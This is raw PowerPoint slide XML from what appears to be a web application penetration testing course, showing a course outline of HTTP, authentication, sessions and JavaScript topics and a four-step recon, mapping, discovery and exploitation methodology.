            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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228600" y="76200"/>
            <a:ext cx="8458200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web App Pen Test Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Our methodology has four steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Based on years of testing by many different web testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is an iterative methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each step is based on the results from the previous steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The process is also cyclical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each exploitation starts you again from a new perspective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>By cycling through the steps, more issues can be found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137220" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1752600" y="2095500"/>
            <a:ext cx="5562600" cy="209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137221" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1962150" y="2108200"/>
            <a:ext cx="3617913" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137222" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1962150" y="2108200"/>
            <a:ext cx="3617913" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175" cap="rnd">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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137223" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="3403600" y="2225675"/>
            <a:ext cx="673100"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342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Recon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137224" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2533650" y="2625725"/>
            <a:ext cx="3617913" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D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hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137225" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2533650" y="2625725"/>
            <a:ext cx="3617913" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175" cap="rnd">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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137226" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="3856038" y="2743200"/>
            <a:ext cx="1081087"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342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Mapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137227" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3008313" y="3143250"/>
            <a:ext cx="3714750" cy="519113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137228" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3008313" y="3143250"/>
            <a:ext cx="3714750" cy="519113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175" cap="rnd">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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137229" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="4308475" y="3259138"/>
            <a:ext cx="1022350"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342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137230" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3505200" y="3657600"/>
            <a:ext cx="3522663" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="3175" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137231" name="Freeform 27"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6296025" y="2452688"/>
            <a:ext cx="1006475" cy="1076325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T1" fmla="*/ 0 h 813"/>
              <a:gd name="T2" fmla="*/ 0 w 761"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 813"/>
